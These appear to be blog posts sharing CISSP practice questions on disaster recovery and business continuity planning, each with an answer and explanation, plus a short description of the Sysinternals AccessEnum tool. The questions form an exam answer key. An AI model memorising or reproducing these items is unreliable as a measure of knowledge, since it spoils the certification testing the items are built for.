Senior management should support all functions of disaster recovery and business continuity, and they should oversee the progress of developing, implementing, and testing the plans. They should also ensure that the proper resources and budget are available. But they are not usually the ones who actually implement the plans.

Question:
Which of the following issues is least important when quantifying risks associated with a potential disaster?

A.Gathering information from agencies that report the probability of certain natural disasters taking place in that area
B.Identifying the company’s key functions and business requirements
C.Identifying critical systems that support the company’s operations
D.Estimating the potential loss and impact the company would face based on how long the outage lasts

Answer:
A.Gathering information from agencies that report the probability of certain natural disasters taking place in that area

Explanation:
Information gathered from agencies that report the probability of certain natural disasters taking place in that area would be the least important out of this list.

Question:
Which of the following is the fourth step in a business impact analysis?

A.Identify the company's critical business functions.
B.Calculate how long these functions can survive without these resources.
C.Identify the resources these functions depend upon.
D.Calculate the risk for each different business function.

Answer:
B.Calculate how long these functions can survive without these resources.

Explanation:
The detailed steps of carrying out a business impact analysis are shown below:
- Select individuals to interview for data gathering.
- Create data-gathering techniques (surveys, questionnaires, qualitative and quantitative approaches).
- Identify the company's critical business functions.
- Identify the resources these functions depend upon.
- Calculate how long these functions can survive without these resources.
- Identify vulnerabilities and threats to these functions.
- Calculate the risk for each different business function.
- Document findings and report them to management.

Question:
Which of the following statements is true of a full-scale BCP?

A.It is a long-term project.
B.It is a short-term project.
C.It is a single entity venture.
D.BCP guarantees no service interruption.

Answer:
A.It is a long-term project.

Explanation:
A BCP plan is a long-term project and must have support from upper management. It could take a year or more for a small to medium-size business before the plan is implemented and fully tested.

Question:
A hot site offers ___ recovery with ____ costs.

A.Instant, high
B.Moderate, high
C.Instant, low
D.Moderate, low

Answer:
A.Instant, high

Explanation:
A hot site has all of the equipment in place and can allow fast recovery. However it is also the most expensive solution.

Question:
Sam is a manager who is responsible for overseeing the development and the approval of the business continuity plan. He needs to make sure that his team is creating correct and all-inclusive loss criteria when it comes to potential business impacts. Which of the following should not be included in these criteria?
i. Loss in reputation and public confidence
ii. Loss of competitive advantages
iii. Decrease in operational expenses
iv. Violations of contract agreements
v. Violations of legal and regulatory requirements
vi. Delayed income costs
vii. Loss in revenue
viii. Loss in productivity

A.i, ii
B.v, vi
C.v
D.iii

Answer:
D.iii

Explanation:
Loss criteria must be applied to the individual threats that were identified. The criteria should include at least the following:
- Loss in reputation and public confidence
- Loss of competitive advantages
- Increase in operational expenses
- Violations of contract agreements
- Violations of legal and regulatory requirements
- Delayed income costs
- Loss in revenue
- Loss in productivity

Question:
Part of operational recovery is designing backup facility configurations to work in an acceptable manner so that business can continue. Which of the following is a setup that allows services to be distributed over two or more in-house centers?

A.Hot site
B.Multi-processing center
C.Mobile site
D.Reciprocal agreements

Answer:
B.Multi-processing center

Explanation:
A multi-processing center allows a company to have backup over multiple facilities where services have been distributed.

Question:
Recovery strategies are pre-established and management-______ steps that should be put into action in the event of a disaster.

A.Approved
B.Directed
C.Requested
D.Documented

Answer:
A.Approved

Explanation:
Recovery strategies are planned ahead of time before they are needed. These strategies are approved by management and are tested.

Question:
Amy has been appointed to the BCP team and is in charge of information gathering for the business impact analysis. Amy could use any of the following tools to gather information, except:

A.Surveys
B.Questionnaires
C.Workshops
D.Quantitative formulas

Answer:
D.Quantitative formulas

Explanation:
Amy is only at the information gathering step at this stage. She would not be doing her quantitative or qualitative risk assessment yet.

Question:
Which of the following provides the correct characteristic for the specific data backup type?

A.Differential process backs up the files that have been modified since the last backup
B.Differential process backs up the files that have been modified since the last full backup
C.Incremental process sets the archive bit to 1
D.Differential process sets the archive bit to 1

Answer:
B.Differential process backs up the files that have been modified since the last full backup

Explanation:
A differential process backs up the files that have been modified since the last full backup. When the data need to be restored, the full backup is laid down first, and then the most recent differential backup is put down on top of it.
The differential process does not change the archive bit value. An incremental process backs up all the files that have changed since the last full or incremental backup and sets the archive bit to 0.

Part 1: http://e-forense.blogspot.com/2014/05/isc-cissp-certified-information-systems.html
Part 2: http://e-forense.blogspot.com/2014/05/isc-cissp-certified-information-systems_1.HTML
Part 3: http://e-forense.blogspot.com/2014/05/isc-cissp-certified-information-systems_2.HTML
Part 5: http://e-forense.blogspot.com/2014/05/isc-cissp-certified-information-systems_8.html
Part 6: http://e-forense.blogspot.com/2014/05/isc-cissp-certified-information-systems_9.html

Sysinternals Tools - Tools for every kind of IT - Part 3 - AccessEnum v1.32

AccessEnum v1.32



While the flexible security model used by Windows NT-based systems allows full control over security and file permissions, managing permissions so that users have appropriate access to files, directories and registry keys can be difficult.

There is no built-in way to quickly view which users have access to a directory tree or to a set of registry keys.

AccessEnum gives you a full view of your file system and Registry security settings in seconds, which makes it the ideal tool for helping you find security holes and lock down permissions where necessary.

More information: http://technet.microsoft.com/en-us/sysinternals/bb897332
Download: http://download.sysinternals.com/files/AccessEnum.zip

(ISC)² CISSP - Certified Information Systems Security Professional - A little help with the CISSP certification questions - Part 3



Third part of the question dump for the CISSP.

Before the exam, in addition to attending the course, it is always advisable to have some literature at hand:

- https://umeshume.files.wordpress.com/2013/03/mcgraw-hill-osborne-media-cissp-all-in-one-exam-guide-6th-edition-2012.pdf

Also take a careful look at this link: http://opensecuritytraining.info/CISSP-Main.HTML


Question:
Which are the proper steps of developing a disaster recovery and continuity plan?

A. Project initiation, strategy development, business impact analysis, plan development, implementation, testing, and maintenance
B. Strategy development, project initiation, business impact analysis, plan development, implementation, testing, and maintenance
C. Implementation and testing, project initiation, strategy development, business impact analysis, and plan development
D. Plan development, project initiation, strategy development, business impact analysis, implementation, testing, and maintenance

Answer:
A. Project initiation, strategy development, business impact analysis, plan development, implementation, testing, and maintenance

Explanation:
These steps outline the processes that should take place from beginning to end pertaining to these types of plans.

Question:
During development, testing, and maintenance of the disaster recovery and continuity plan, a high degree of interaction and communication is crucial to the process. Why?

A. This is a regulatory requirement of the process.
B. The more people talk about it and get involved, the more awareness will increase.
C. This is not crucial to the plan and should not be interactive because it will most likely affect operations.
D. Management will more likely support it.

Answer:
B. The more people talk about it and get involved, the more awareness will increase.

Explanation:
Communication not only provides awareness of these plans and their contents, but also allows more people to discuss the possible threats and solutions that the original team may not uncover.

Question:
John has to create a team to carry out a business impact analysis and develop the company's business continuity plan. Which of the following should not be on this team?
i. Business units
ii. Senior management
iii. IT department
iv. Security department
v. Communications department
vi. Legal department

A. v.
B. None of them
C. All of them
D. i.

Answer:
B. None of them

Explanation:
The best plan is when all issues and threats are brought to the table and discussed. This cannot be done effectively with a few people who are familiar with only a couple of departments. Representatives from each department must be involved with not only the planning stages but also the testing and implementation stages.
The committee should be made up of representatives from at least the following departments:
- Business units
- Senior management
- IT department
- Security department
- Communications department
- Legal department

Question:
When is the emergency state actually over for a company?

A. When all people are safe and accounted for
B. When all operations and people are moved back into the primary site
C. When operations are safely moved to the off-site facility
D. When a civil official declares that all is safe

Answer:
B. When all operations and people are moved back into the primary site

Explanation:
The emergency state is not actually over until the company moves back into their primary site. The company is still vulnerable and at risk while it is operating in an altered or crippled state. This state of vulnerability is not over until the company is back operating in the fashion that it was prior to the disaster. Of course, this may mean that the primary site has to be totally rebuilt if it was destroyed.

Question:
Using another company's facilities in the event of a disaster is called what?

A. Rolling hot site
B. Redundant site
C. Merger
D. Reciprocal agreement

Answer:
D. Reciprocal agreement

Explanation:
Reciprocal agreements with other companies can be a cheap alternative to disaster recovery but are very difficult to enforce legally. A reciprocal agreement is not enforceable, meaning that the company that agreed to let the damaged company work out of its facility can decide not to allow this to take place.
A reciprocal agreement is a better secondary backup option if the primary plan falls through.

Question:
A disaster recovery procedure involving all affected departments acting out a specific scenario, but which does not go to an off-site facility, is referred to as a:

A. Simulation test
B. Structured walk-through test
C. Checklist test
D. Parallel test

Answer:
A. Simulation test

Explanation:
Simulation tests measure the responsiveness of each department during an emergency situation. A scenario is constructed, as in a flood, earthquake, or terrorist attack, and people are to carry out the tasks expected of them.

Question:
What should be done first when the original facility becomes operational again following a disaster?

A. Inform the media and stockholders
B. Inform all of the employees
C. Move the most critical functions to the original facility
D. Move the least critical functions to the original facility

Answer:
D. Move the least critical functions to the original facility

Explanation:
To ensure that critical business functions and systems continue to operate during a move back to the original facility, the first step should be reinstating the least critical functions.

Question:
Which is not true of a reciprocal agreement?

A. It is a temporary solution.
B. It is expensive.
C. It is difficult to enforce.
D. Most environments are not able to support multiple business operations at one time.

Answer:
B. It is expensive.

Explanation:
While a reciprocal agreement is difficult to implement and enforce, it does offer an extremely inexpensive alternative to disaster recovery. It is an agreement between two companies, which usually have very similar technologies, to open their doors to each other in case of an emergency or disaster.

Question:
Which of the following disaster recovery tests is the most intrusive to business operations?

A. Parallel
B. Simulation
C. Full-interruption
D. Checklist

Answer:
C. Full-interruption

Explanation:
Full-interruption tests require the original site to be completely shut down and all processes moved to an alternate site. This can be very disruptive to a company, but is the only way to really know the disaster recovery plan will work when it is needed.

Question:
Talking to external organizations after a disaster is important for all of the following reasons except:

A. To inform customers and shareholders of the company's status
B. To redirect unfavorable attention to other entities
C. To ensure that the media is reporting the facts accurately
D. To help stop rumors from developing

Answer:
B. To redirect unfavorable attention to other entities

Explanation:
Informing the public and affected groups is a critical part of disaster recovery so that the company's reputation and overall business status are not damaged. The information that will be reported should be prepared beforehand, along with deciding who will be responsible for communicating the message to the public and press.

Part 1: http://e-forense.blogspot.com/2014/05/isc-cissp-certified-information-systems.html
Part 2: http://e-forense.blogspot.com/2014/05/isc-cissp-certified-information-systems_1.HTML
Part 4: http://e-forense.blogspot.com/2014/05/isc-cissp-certified-information-systems_5.HTML
Part 5: http://e-forense.blogspot.com/2014/05/isc-cissp-certified-information-systems_8.html
Part 6: http://e-forense.blogspot.com/2014/05/isc-cissp-certified-information-systems_9.html
